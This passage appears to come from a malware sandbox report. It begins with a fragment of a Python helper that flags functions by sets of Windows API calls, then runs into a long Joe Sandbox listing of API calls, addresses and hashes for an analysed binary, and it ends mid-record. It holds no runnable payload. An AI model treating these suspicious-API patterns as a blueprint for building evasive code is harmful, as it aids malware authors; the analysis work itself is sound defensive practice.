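        {"GetFullPathNameW", "MoveFileW"},
}

def flag_function(calls: list) -> list:
    names = {c.api for c in calls}
    return [label for label, needed in FLAG_RULES.items() if needed <= names]

# Constructed input: two records copied from this report's listing.
SAMPLE_LISTING = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 00434643
• GetForegroundWindow.USER32(00000000), ref: 00434655
• GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
Memory Dump Source
• Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
APIs
  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
• SendMessageW.USER32(76C223D0,00001001,00000000,?), ref: 00448E16
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
• SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
Memory Dump Source
"""
```

Paste a larger stretch of a report into `SAMPLE_LISTING` (or read it from a file) and loop over `parse_listing(...)`, printing `flag_function(calls)` per record; the second record shows why the message decoder must tolerate a `?` where a message ID was expected, and the `ref` field keeps every hit tied back to an address that can be looked up in the dump.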
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                              • API String ID: 0-1603158881
                                                                                              • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                              • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                              • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                              • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                              APIs
                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                              • DestroyWindow.USER32(?), ref: 00426F50
                                                                                              • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                              • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                              • String ID: close all$Wu
                                                                                              • API String ID: 4174999648-1790509019
                                                                                              • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                              • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                              • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                              • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                              APIs
                                                                                              • CreateMenu.USER32 ref: 00448603
                                                                                              • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                              • IsMenu.USER32(?), ref: 004486AB
                                                                                              • CreatePopupMenu.USER32 ref: 004486B5
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                              • DrawMenuBar.USER32 ref: 004486F5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                              • String ID: 0
                                                                                              • API String ID: 161812096-4108050209
                                                                                              • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                              • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                              • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                              • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                              • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                              • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                              • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                              • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                              • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                              • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                              APIs
                                                                                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 978794511-0
                                                                                              • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                              • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                              • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                              • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                              • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                              • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                              • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClearVariant
                                                                                              • String ID:
                                                                                              • API String ID: 1473721057-0
                                                                                              • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                              • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                              • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                              • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$_memcmp
                                                                                              • String ID: '$\$h
                                                                                              • API String ID: 2205784470-1303700344
                                                                                              • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                              • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                                              • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                              • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                              • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                              • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                              • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                              • __swprintf.LIBCMT ref: 0045EC33
                                                                                              • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                              Strings
                                                                                              • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                              • String ID: %4d%02d%02d%02d%02d%02d
                                                                                              • API String ID: 2441338619-1568723262
                                                                                              • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                              • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                              • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                              • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                              APIs
                                                                                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                              • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                              • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                              • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                              • String ID: @COM_EVENTOBJ
                                                                                              • API String ID: 327565842-2228938565
                                                                                              • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                              • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                              • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                              • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                              APIs
                                                                                              • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                              • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                              • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                              • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                              • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                                • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                                • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                              • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                              • String ID: H
                                                                                              • API String ID: 3613100350-2852464175
                                                                                              • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                              • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                              • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                              • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                              • String ID:
                                                                                              • API String ID: 1291720006-3916222277
                                                                                              • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                              • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                              • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                              • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                              • IsMenu.USER32(?), ref: 0045FC5F
                                                                                              • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                              • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                              • String ID: 0$2
                                                                                              • API String ID: 93392585-3793063076
                                                                                              • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                              • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                              • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                              • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                              APIs
                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                              • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                              • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                              • String ID: crts
